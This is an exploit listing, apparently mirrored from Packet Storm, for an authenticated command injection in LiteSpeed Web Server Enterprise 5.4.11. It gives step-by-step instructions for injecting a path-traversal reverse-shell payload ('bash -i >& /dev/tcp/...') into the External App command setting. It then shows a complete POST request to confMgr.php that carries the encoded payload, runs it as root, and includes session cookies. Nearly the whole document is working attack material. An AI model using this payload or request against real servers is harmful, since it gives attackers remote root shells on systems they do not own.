Share 
## https://sploitus.com/exploit?id=PACKETSTORM:161290
# Exploit Title: LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)  
# Date: 05/20/2021  
# Exploit Author: cmOs - SunCSR  
# Vendor Homepage: https://www.litespeedtech.com/  
# Software Link: https://www.litespeedtech.com/products  
# Version: 5.4.11  
# Ubuntu/Kali Linux  
  
  
Step 1: Log in to the dashboard using the Administrator account.  
Step 2 : Access Server Configuration > Server > External App > Edit  
Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)  
Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value  
Step 5: Graceful Restart  
  
[POC]  
  
POST /config/confMgr.php HTTP/1.1  
Host: 192.168.1.6:7080  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101  
Firefox/85.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*  
;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer:  
https://192.168.1.6:7080/config/confMgr.php?m=serv&p=ext&t=A_EXT_FCGI&r=file&a=E&tk=0.59220300%201612516386  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 505  
Origin: https://192.168.1.6:7080  
Connection: close  
Cookie: LSWSWEBUI=85fa7ba9b37d18d57e41e092a2a2a61f;  
lsws_uid=j%2FsI8GRiKBc%3D; lsws_pass=c7pC2izvdbQ%3D  
Upgrade-Insecure-Requests: 1  
  
name=file&address=127.0.0.1%3A5434&note=&maxConns=2000&env=&initTimeout=1&retryTimeout=1&persistConn=1&pcKeepAliveTimeout=20&respBuffer=0&autoStart=1&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.1.6%2F1234+0%3E%261%27&backlog=&instances=&extUser=root&extGroup=root&umask=&runOnStartUp=3&extMaxIdleTime=&priority=&memSoftLimit=&memHardLimit=&procSoftLimit=&procHardLimit=&a=s&m=serv&p=ext&t=A_EXT_FCGI&r=file&tk=0.59220300+1612516386&file_create=